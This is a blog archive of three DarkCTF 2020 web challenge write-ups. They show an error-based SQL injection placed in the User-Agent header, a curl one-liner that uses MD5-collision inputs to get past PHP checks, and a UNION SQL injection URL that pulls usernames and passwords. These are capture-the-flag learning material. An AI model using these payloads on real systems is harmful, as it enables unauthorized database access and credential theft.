Cookie Consent by PrivacyPolicies.com

Archives of tag web


Tag web

DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don't know which one. Can u help me to find it?

http://agent.darkarmy.xyz/

flag format darkCTF{databasename}

Solution

From the source we can get info, that default credentials are admin/admin.

Site after login shows my user agent, so my first idea was to perform sql injection through my user agent.

After few attempts I ended up finally with below user agent setup ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!

darkCTF{ag3nt_u_1s_v3ry_t3l3nt3d}

DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web

Solution

We started with some php code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>
</head>
<body>
    

    <style>
        body{
            background-color: whitesmoke
        }
    </style>
<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?>
</body>
</html> 
1

There are bunch of ifs, that needs to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the most tricky one, karma and 2020 parameters must not be equal, but their md5 hashes needs to be the same, so we need to use strings which are affected by hash collision

I've used the hexcodes for the karma and 2020 parameters and decoded them into right strings with xxd on the fly, because bash is not doing well with nonprintable characters. Flag has been conquered with following oneliner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "http://php.darkarmy.xyz:7001/?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09" --verbose

DarkCTF{very_nice_web_challenge_dark_ctf}

DarkCTF 2020: Web/So_Simple

Web/So_Simple

173 points

"Try Harder" may be You get flag manually

Try id as parameter

http://web.darkarmy.xyz:30001

Solution

After spending some time on preparing sql injection payload, I've managed finally to create correct one.

http://sosimple.darkarmy.xyz/?id=0%27%20UNION%20ALL%20SELECT%20ID,username,password%20FROM%20users%20WHERE%20username%20like%20%22%{%%22%20OR%20password%20like%20%22%{%%22%20LIMIT%201,2;%20--%20

darkCTF{uniqu3_ide4_t0_find_fl4g}